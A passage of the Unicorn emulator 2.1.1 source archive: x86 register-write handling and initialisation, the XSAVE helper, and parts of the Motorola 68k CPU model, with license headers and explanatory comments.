*)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); cpu_set_mxcsr(env, *(uint32_t *)value); break; /* // Don't think base registers are a "thing" on x86 case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint32_t); env->segs[R_FS].base = *(uint32_t *)value; continue; case UC_X86_REG_GS_BASE: CHECK_REG_TYPE(uint32_t); env->segs[R_GS].base = *(uint32_t *)value; continue; */ } break; #ifdef TARGET_X86_64 case UC_MODE_64: switch (regid) { default: break; case UC_X86_REG_CR0: CHECK_REG_TYPE(uint64_t); cpu_x86_update_cr0(env, *(uint32_t *)value); goto write_cr64; case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: CHECK_REG_TYPE(uint64_t); cpu_x86_update_cr3(env, *(uint32_t *)value); goto write_cr64; case UC_X86_REG_CR4: CHECK_REG_TYPE(uint64_t); cpu_x86_update_cr4(env, *(uint32_t *)value); write_cr64: env->cr[regid - UC_X86_REG_CR0] = *(uint64_t *)value; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(uint64_t); env->dr[regid - UC_X86_REG_DR0] = *(uint64_t *)value; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(uint16_t); cpu_load_eflags(env, *(uint16_t *)value, -1); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(uint32_t); cpu_load_eflags(env, *(uint32_t *)value, -1); break; case UC_X86_REG_RFLAGS: CHECK_REG_TYPE(uint64_t); cpu_load_eflags(env, *(uint64_t *)value, -1); break; case UC_X86_REG_RAX: CHECK_REG_TYPE(uint64_t); env->regs[R_EAX] = *(uint64_t *)value; break; case UC_X86_REG_EAX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EAX], *(uint32_t *)value); break; case UC_X86_REG_AX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EAX], *(uint16_t *)value); break; case UC_X86_REG_AH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_AL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_RBX: CHECK_REG_TYPE(uint64_t); env->regs[R_EBX] = *(uint64_t *)value; break; case UC_X86_REG_EBX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EBX], *(uint32_t *)value); break; case UC_X86_REG_BX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBX], *(uint16_t *)value); break; case UC_X86_REG_BH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EBX], *(uint8_t *)value); break; 
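/*
 * Note: writing a 32-bit alias (EAX, EBX, ...) through WRITE_DWORD here is
 * believed to preserve the upper 32 bits of the 64-bit register -- a
 * register poke models a debugger write, not an executed "mov r32, imm"
 * (which zero-extends on real hardware). Callers wanting architectural
 * semantics should write the full register:
 *
 *   uint64_t rax = 0x12345678u;   // upper 32 bits cleared explicitly
 *   uc_reg_write(uc, UC_X86_REG_RAX, &rax);
 */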
case UC_X86_REG_BL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EBX], *(uint8_t *)value); break; case UC_X86_REG_RCX: CHECK_REG_TYPE(uint64_t); env->regs[R_ECX] = *(uint64_t *)value; break; case UC_X86_REG_ECX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_ECX], *(uint32_t *)value); break; case UC_X86_REG_CX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ECX], *(uint16_t *)value); break; case UC_X86_REG_CH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_CL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_RDX: CHECK_REG_TYPE(uint64_t); env->regs[R_EDX] = *(uint64_t *)value; break; case UC_X86_REG_EDX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EDX], *(uint32_t *)value); break; case UC_X86_REG_DX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDX], *(uint16_t *)value); break; case UC_X86_REG_DH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_DL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_RSP: CHECK_REG_TYPE(uint64_t); env->regs[R_ESP] = *(uint64_t *)value; break; case UC_X86_REG_ESP: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_ESP], *(uint32_t *)value); break; case UC_X86_REG_SP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESP], *(uint16_t *)value); break; case UC_X86_REG_SPL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ESP], *(uint8_t *)value); break; case UC_X86_REG_RBP: CHECK_REG_TYPE(uint64_t); env->regs[R_EBP] = *(uint64_t *)value; break; case UC_X86_REG_EBP: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EBP], *(uint32_t *)value); break; case UC_X86_REG_BP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBP], *(uint16_t *)value); break; case UC_X86_REG_BPL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EBP], *(uint8_t *)value); break; case UC_X86_REG_RSI: CHECK_REG_TYPE(uint64_t); env->regs[R_ESI] = *(uint64_t *)value; break; case UC_X86_REG_ESI: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_ESI], *(uint32_t *)value); break; case UC_X86_REG_SI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESI], *(uint16_t *)value); break; case UC_X86_REG_SIL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ESI], *(uint8_t *)value); break; case UC_X86_REG_RDI: CHECK_REG_TYPE(uint64_t); env->regs[R_EDI] = *(uint64_t *)value; break; case UC_X86_REG_EDI: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EDI], *(uint32_t *)value); break; case UC_X86_REG_DI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDI], *(uint16_t *)value); break; case UC_X86_REG_DIL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EDI], *(uint8_t *)value); break; case UC_X86_REG_RIP: CHECK_REG_TYPE(uint64_t); env->eip = *(uint64_t *)value; *setpc = 1; break; case UC_X86_REG_EIP: CHECK_REG_TYPE(uint32_t); env->eip = *(uint32_t *)value; *setpc = 1; break; case UC_X86_REG_IP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->eip, *(uint16_t *)value); *setpc = 1; break; case UC_X86_REG_CS: CHECK_REG_TYPE(uint16_t); env->segs[R_CS].selector = *(uint16_t *)value; break; case UC_X86_REG_DS: CHECK_REG_TYPE(uint16_t); env->segs[R_DS].selector = *(uint16_t *)value; break; case UC_X86_REG_SS: CHECK_REG_TYPE(uint16_t); env->segs[R_SS].selector = *(uint16_t *)value; break; case UC_X86_REG_ES: CHECK_REG_TYPE(uint16_t); env->segs[R_ES].selector = *(uint16_t *)value; break; case UC_X86_REG_FS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); if 
(ret) { return ret; } cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); break; case UC_X86_REG_GS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); break; case UC_X86_REG_R8: CHECK_REG_TYPE(uint64_t); env->regs[8] = *(uint64_t *)value; break; case UC_X86_REG_R8D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[8], *(uint32_t *)value); break; case UC_X86_REG_R8W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[8], *(uint16_t *)value); break; case UC_X86_REG_R8B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[8], *(uint8_t *)value); break; case UC_X86_REG_R9: CHECK_REG_TYPE(uint64_t); env->regs[9] = *(uint64_t *)value; break; case UC_X86_REG_R9D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[9], *(uint32_t *)value); break; case UC_X86_REG_R9W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[9], *(uint16_t *)value); break; case UC_X86_REG_R9B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[9], *(uint8_t *)value); break; case UC_X86_REG_R10: CHECK_REG_TYPE(uint64_t); env->regs[10] = *(uint64_t *)value; break; case UC_X86_REG_R10D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[10], *(uint32_t *)value); break; case UC_X86_REG_R10W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[10], *(uint16_t *)value); break; case UC_X86_REG_R10B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[10], *(uint8_t *)value); break; case UC_X86_REG_R11: CHECK_REG_TYPE(uint64_t); env->regs[11] = *(uint64_t *)value; break; case UC_X86_REG_R11D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[11], *(uint32_t *)value); break; case UC_X86_REG_R11W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[11], *(uint16_t *)value); break; case UC_X86_REG_R11B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[11], *(uint8_t *)value); break; case UC_X86_REG_R12: CHECK_REG_TYPE(uint64_t); env->regs[12] = *(uint64_t *)value; break; case UC_X86_REG_R12D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[12], *(uint32_t *)value); break; case UC_X86_REG_R12W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[12], *(uint16_t *)value); break; case UC_X86_REG_R12B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[12], *(uint8_t *)value); break; case UC_X86_REG_R13: CHECK_REG_TYPE(uint64_t); env->regs[13] = *(uint64_t *)value; break; case UC_X86_REG_R13D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[13], *(uint32_t *)value); break; case UC_X86_REG_R13W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[13], *(uint16_t *)value); break; case UC_X86_REG_R13B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[13], *(uint8_t *)value); break; case UC_X86_REG_R14: CHECK_REG_TYPE(uint64_t); env->regs[14] = *(uint64_t *)value; break; case UC_X86_REG_R14D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[14], *(uint32_t *)value); break; case UC_X86_REG_R14W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[14], *(uint16_t *)value); break; case UC_X86_REG_R14B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[14], *(uint8_t *)value); break; case UC_X86_REG_R15: CHECK_REG_TYPE(uint64_t); env->regs[15] = *(uint64_t *)value; break; case UC_X86_REG_R15D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[15], *(uint32_t *)value); break; case UC_X86_REG_R15W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[15], *(uint16_t *)value); break; case UC_X86_REG_R15B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[15], *(uint8_t *)value); break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); env->idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->idt.base = 
((uc_x86_mmr *)value)->base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); env->gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->gdt.base = ((uc_x86_mmr *)value)->base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); env->ldt.limit = ((uc_x86_mmr *)value)->limit; env->ldt.base = ((uc_x86_mmr *)value)->base; env->ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->ldt.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); env->tr.limit = ((uc_x86_mmr *)value)->limit; env->tr.base = ((uc_x86_mmr *)value)->base; env->tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->tr.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_write(env, (uc_x86_msr *)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); cpu_set_mxcsr(env, *(uint32_t *)value); break; case UC_X86_REG_XMM8: case UC_X86_REG_XMM9: case UC_X86_REG_XMM10: case UC_X86_REG_XMM11: case UC_X86_REG_XMM12: case UC_X86_REG_XMM13: case UC_X86_REG_XMM14: case UC_X86_REG_XMM15: { CHECK_REG_TYPE(float64[2]); float64 *src = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; reg->ZMM_Q(0) = src[0]; reg->ZMM_Q(1) = src[1]; break; } case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint64_t); env->segs[R_FS].base = *(uint64_t *)value; return 0; case UC_X86_REG_GS_BASE: CHECK_REG_TYPE(uint64_t); env->segs[R_GS].base = *(uint64_t *)value; return 0; } break; #endif } return ret; } static bool x86_stop_interrupt(struct uc_struct *uc, int intno) { switch (intno) { default: return false; case EXCP06_ILLOP: return true; } } static bool x86_insn_hook_validate(uint32_t insn_enum) { // for x86 we can only hook IN, OUT, and SYSCALL if (insn_enum != UC_X86_INS_IN && insn_enum != UC_X86_INS_OUT && insn_enum != UC_X86_INS_SYSCALL && insn_enum != UC_X86_INS_SYSENTER && insn_enum != UC_X86_INS_CPUID) { return false; } return true; } static bool x86_opcode_hook_invalidate(uint32_t op, uint32_t flags) { if (op != UC_TCG_OP_SUB) { return false; } switch (op) { case UC_TCG_OP_SUB: if ((flags & UC_TCG_OP_FLAG_CMP) && (flags & UC_TCG_OP_FLAG_DIRECT)) { return false; } break; default: return false; } return true; } static int x86_cpus_init(struct uc_struct *uc, const char *cpu_model) { X86CPU *cpu; cpu = cpu_x86_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->release = x86_release; uc->set_pc = x86_set_pc; uc->get_pc = x86_get_pc; uc->stop_interrupt = x86_stop_interrupt; uc->insn_hook_validate = x86_insn_hook_validate; uc->opcode_hook_invalidate = x86_opcode_hook_invalidate; uc->cpus_init = x86_cpus_init; uc->cpu_context_size = offsetof(CPUX86State, retaddr); uc_common_init(uc); } /* vim: set ts=4 sts=4 sw=4 et: */ 
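/*
 * Usage sketch (not part of the original file): the hooks installed by
 * uc_init() above are what the public API dispatches to. Assuming only
 * documented Unicorn calls, a minimal register round-trip looks like:
 *
 *   #include <unicorn/unicorn.h>
 *
 *   uc_engine *uc;
 *   uint32_t in = 0xdeadbeef, out = 0;
 *   uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
 *   uc_reg_write(uc, UC_X86_REG_EAX, &in);   // ends up in reg_write() above
 *   uc_reg_read(uc, UC_X86_REG_EAX, &out);   // out == 0xdeadbeef
 *   uc_close(uc);
 */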
unicorn-2.1.1/qemu/target/i386/unicorn.h
/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #ifndef UC_QEMU_TARGET_I386_H #define UC_QEMU_TARGET_I386_H // functions to read & write registers uc_err reg_read_x86_64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_x86_64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_x86_64(struct uc_struct *uc); #endif
unicorn-2.1.1/qemu/target/i386/xsave_helper.c
/* * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory.
*/ #include "qemu/osdep.h" #include "cpu.h" void x86_cpu_xsave_all_areas(X86CPU *cpu, X86XSaveArea *buf) { CPUX86State *env = &cpu->env; X86XSaveArea *xsave = buf; uint16_t cwd, swd, twd; int i; memset(xsave, 0, sizeof(X86XSaveArea)); twd = 0; swd = env->fpus & ~(7 << 11); swd |= (env->fpstt & 7) << 11; cwd = env->fpuc; for (i = 0; i < 8; ++i) { twd |= (!env->fptags[i]) << i; } xsave->legacy.fcw = cwd; xsave->legacy.fsw = swd; xsave->legacy.ftw = twd; xsave->legacy.fpop = env->fpop; xsave->legacy.fpip = env->fpip; xsave->legacy.fpdp = env->fpdp; memcpy(&xsave->legacy.fpregs, env->fpregs, sizeof env->fpregs); xsave->legacy.mxcsr = env->mxcsr; xsave->header.xstate_bv = env->xstate_bv; memcpy(&xsave->bndreg_state.bnd_regs, env->bnd_regs, sizeof env->bnd_regs); xsave->bndcsr_state.bndcsr = env->bndcs_regs; memcpy(&xsave->opmask_state.opmask_regs, env->opmask_regs, sizeof env->opmask_regs); for (i = 0; i < CPU_NB_REGS; i++) { uint8_t *xmm = xsave->legacy.xmm_regs[i]; uint8_t *ymmh = xsave->avx_state.ymmh[i]; uint8_t *zmmh = xsave->zmm_hi256_state.zmm_hi256[i]; stq_p(xmm, env->xmm_regs[i].ZMM_Q(0)); stq_p(xmm+8, env->xmm_regs[i].ZMM_Q(1)); stq_p(ymmh, env->xmm_regs[i].ZMM_Q(2)); stq_p(ymmh+8, env->xmm_regs[i].ZMM_Q(3)); stq_p(zmmh, env->xmm_regs[i].ZMM_Q(4)); stq_p(zmmh+8, env->xmm_regs[i].ZMM_Q(5)); stq_p(zmmh+16, env->xmm_regs[i].ZMM_Q(6)); stq_p(zmmh+24, env->xmm_regs[i].ZMM_Q(7)); } #ifdef TARGET_X86_64 memcpy(&xsave->hi16_zmm_state.hi16_zmm, &env->xmm_regs[16], 16 * sizeof env->xmm_regs[16]); memcpy(&xsave->pkru_state, &env->pkru, sizeof env->pkru); #endif } void x86_cpu_xrstor_all_areas(X86CPU *cpu, const X86XSaveArea *buf) { CPUX86State *env = &cpu->env; const X86XSaveArea *xsave = buf; int i; uint16_t cwd, swd, twd; cwd = xsave->legacy.fcw; swd = xsave->legacy.fsw; twd = xsave->legacy.ftw; env->fpop = xsave->legacy.fpop; env->fpstt = (swd >> 11) & 7; env->fpus = swd; env->fpuc = cwd; for (i = 0; i < 8; ++i) { env->fptags[i] = !((twd >> i) & 1); } env->fpip = xsave->legacy.fpip; env->fpdp = xsave->legacy.fpdp; env->mxcsr = xsave->legacy.mxcsr; memcpy(env->fpregs, &xsave->legacy.fpregs, sizeof env->fpregs); env->xstate_bv = xsave->header.xstate_bv; memcpy(env->bnd_regs, &xsave->bndreg_state.bnd_regs, sizeof env->bnd_regs); env->bndcs_regs = xsave->bndcsr_state.bndcsr; memcpy(env->opmask_regs, &xsave->opmask_state.opmask_regs, sizeof env->opmask_regs); for (i = 0; i < CPU_NB_REGS; i++) { const uint8_t *xmm = xsave->legacy.xmm_regs[i]; const uint8_t *ymmh = xsave->avx_state.ymmh[i]; const uint8_t *zmmh = xsave->zmm_hi256_state.zmm_hi256[i]; env->xmm_regs[i].ZMM_Q(0) = ldq_p(xmm); env->xmm_regs[i].ZMM_Q(1) = ldq_p(xmm+8); env->xmm_regs[i].ZMM_Q(2) = ldq_p(ymmh); env->xmm_regs[i].ZMM_Q(3) = ldq_p(ymmh+8); env->xmm_regs[i].ZMM_Q(4) = ldq_p(zmmh); env->xmm_regs[i].ZMM_Q(5) = ldq_p(zmmh+8); env->xmm_regs[i].ZMM_Q(6) = ldq_p(zmmh+16); env->xmm_regs[i].ZMM_Q(7) = ldq_p(zmmh+24); } #ifdef TARGET_X86_64 memcpy(&env->xmm_regs[16], &xsave->hi16_zmm_state.hi16_zmm, 16 * sizeof env->xmm_regs[16]); memcpy(&env->pkru, &xsave->pkru_state, sizeof env->pkru); #endif } 
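/*
 * Note on the tag-word conversion above: QEMU keeps fptags[i] == 1 for an
 * *empty* x87 register, while the abridged FTW byte in the XSAVE legacy
 * area keeps bit i == 1 for a *valid* one, hence the negation in both
 * directions. Worked example: with exactly one register in use,
 * fptags[] == {0,1,1,1,1,1,1,1}, so legacy.ftw is stored as 0x01.
 */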
unicorn-2.1.1/qemu/target/m68k/
unicorn-2.1.1/qemu/target/m68k/cpu-param.h
/* * m68k cpu parameters for qemu. * * Copyright (c) 2005-2007 CodeSourcery * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef M68K_CPU_PARAM_H #define M68K_CPU_PARAM_H 1 #define TARGET_LONG_BITS 32 /* * Coldfire Linux uses 8k pages * and m68k linux uses 4k pages * use the smallest one */ #define TARGET_PAGE_BITS 12 #define TARGET_PHYS_ADDR_SPACE_BITS 32 #define TARGET_VIRT_ADDR_SPACE_BITS 32 #define NB_MMU_MODES 2 #endif
unicorn-2.1.1/qemu/target/m68k/cpu-qom.h
/* * QEMU Motorola 68k CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_M68K_CPU_QOM_H #define QEMU_M68K_CPU_QOM_H #include "hw/core/cpu.h" #define M68K_CPU(obj) ((M68kCPU *)obj) #define M68K_CPU_CLASS(klass) ((M68kCPUClass *)klass) #define M68K_CPU_GET_CLASS(obj) (&((M68kCPU *)obj)->cc) /* * M68kCPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * A Motorola 68k CPU model.
*/ typedef struct M68kCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } M68kCPUClass; typedef struct M68kCPU M68kCPU; #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/cpu.c����������������������������������������������������������������0000664�0000000�0000000�00000020553�14675241067�0017166�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Motorola 68k CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #include "qemu/osdep.h" #include "cpu.h" #include "fpu/softfloat.h" #include "exec/exec-all.h" static void m68k_cpu_set_pc(CPUState *cs, vaddr value) { M68kCPU *cpu = M68K_CPU(cs); cpu->env.pc = value; } static bool m68k_cpu_has_work(CPUState *cs) { return cs->interrupt_request & CPU_INTERRUPT_HARD; } static void m68k_set_feature(CPUM68KState *env, int feature) { env->features |= (1u << feature); } static void m68k_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); M68kCPU *cpu = M68K_CPU(s); M68kCPUClass *mcc = M68K_CPU_GET_CLASS(cpu); CPUM68KState *env = &cpu->env; floatx80 nan = floatx80_default_nan(NULL); int i; mcc->parent_reset(dev); memset(env, 0, offsetof(CPUM68KState, end_reset_fields)); cpu_m68k_set_sr(env, SR_S | SR_I); for (i = 0; i < 8; i++) { env->fregs[i].d = nan; } cpu_m68k_set_fpcr(env, 0); env->fpsr = 0; /* TODO: We should set PC from the interrupt vector. 
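 * On a real 68000, reset fetches the initial SSP from address 0 and the
 * initial PC from address 4 of the vector table; Unicorn instead leaves
 * pc at 0 here and expects the caller to set it explicitly, e.g. with
 * uc_reg_write(uc, UC_M68K_REG_PC, &pc).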
*/ env->pc = 0; } /* CPU models */ static void m5206_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); } static void m68000_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_M68000); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); m68k_set_feature(env, M68K_FEATURE_MOVEP); } /* common features for 68020, 68030 and 68040 */ static void m680x0_cpu_common(CPUM68KState *env) { m68k_set_feature(env, M68K_FEATURE_M68000); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); m68k_set_feature(env, M68K_FEATURE_QUAD_MULDIV); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_BCCL); m68k_set_feature(env, M68K_FEATURE_BITFIELD); m68k_set_feature(env, M68K_FEATURE_EXT_FULL); m68k_set_feature(env, M68K_FEATURE_SCALED_INDEX); m68k_set_feature(env, M68K_FEATURE_LONG_MULDIV); m68k_set_feature(env, M68K_FEATURE_FPU); m68k_set_feature(env, M68K_FEATURE_CAS); m68k_set_feature(env, M68K_FEATURE_BKPT); m68k_set_feature(env, M68K_FEATURE_RTD); m68k_set_feature(env, M68K_FEATURE_CHK2); m68k_set_feature(env, M68K_FEATURE_MOVEP); } static void m68020_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m680x0_cpu_common(env); m68k_set_feature(env, M68K_FEATURE_M68020); } static void m68030_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m680x0_cpu_common(env); m68k_set_feature(env, M68K_FEATURE_M68030); } static void m68040_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m680x0_cpu_common(env); m68k_set_feature(env, M68K_FEATURE_M68040); } static void m68060_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_M68000); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_BCCL); m68k_set_feature(env, M68K_FEATURE_BITFIELD); m68k_set_feature(env, M68K_FEATURE_EXT_FULL); m68k_set_feature(env, M68K_FEATURE_SCALED_INDEX); m68k_set_feature(env, M68K_FEATURE_LONG_MULDIV); m68k_set_feature(env, M68K_FEATURE_FPU); m68k_set_feature(env, M68K_FEATURE_CAS); m68k_set_feature(env, M68K_FEATURE_BKPT); m68k_set_feature(env, M68K_FEATURE_RTD); m68k_set_feature(env, M68K_FEATURE_CHK2); m68k_set_feature(env, M68K_FEATURE_M68060); } static void m5208_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_CF_EMAC); m68k_set_feature(env, M68K_FEATURE_USP); } static void cfv4e_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_CF_FPU); m68k_set_feature(env, M68K_FEATURE_CF_EMAC); m68k_set_feature(env, M68K_FEATURE_USP); } static void any_cpu_initfn(CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); 
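/*
 * "any" unions the ColdFire ISA revisions selected above with the feature
 * bits below. Each feature is one bit of env->features; m68k_feature()
 * in cpu.h reduces a query to a mask test, effectively:
 *
 *   (env->features & (1u << M68K_FEATURE_CF_FPU)) != 0
 */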
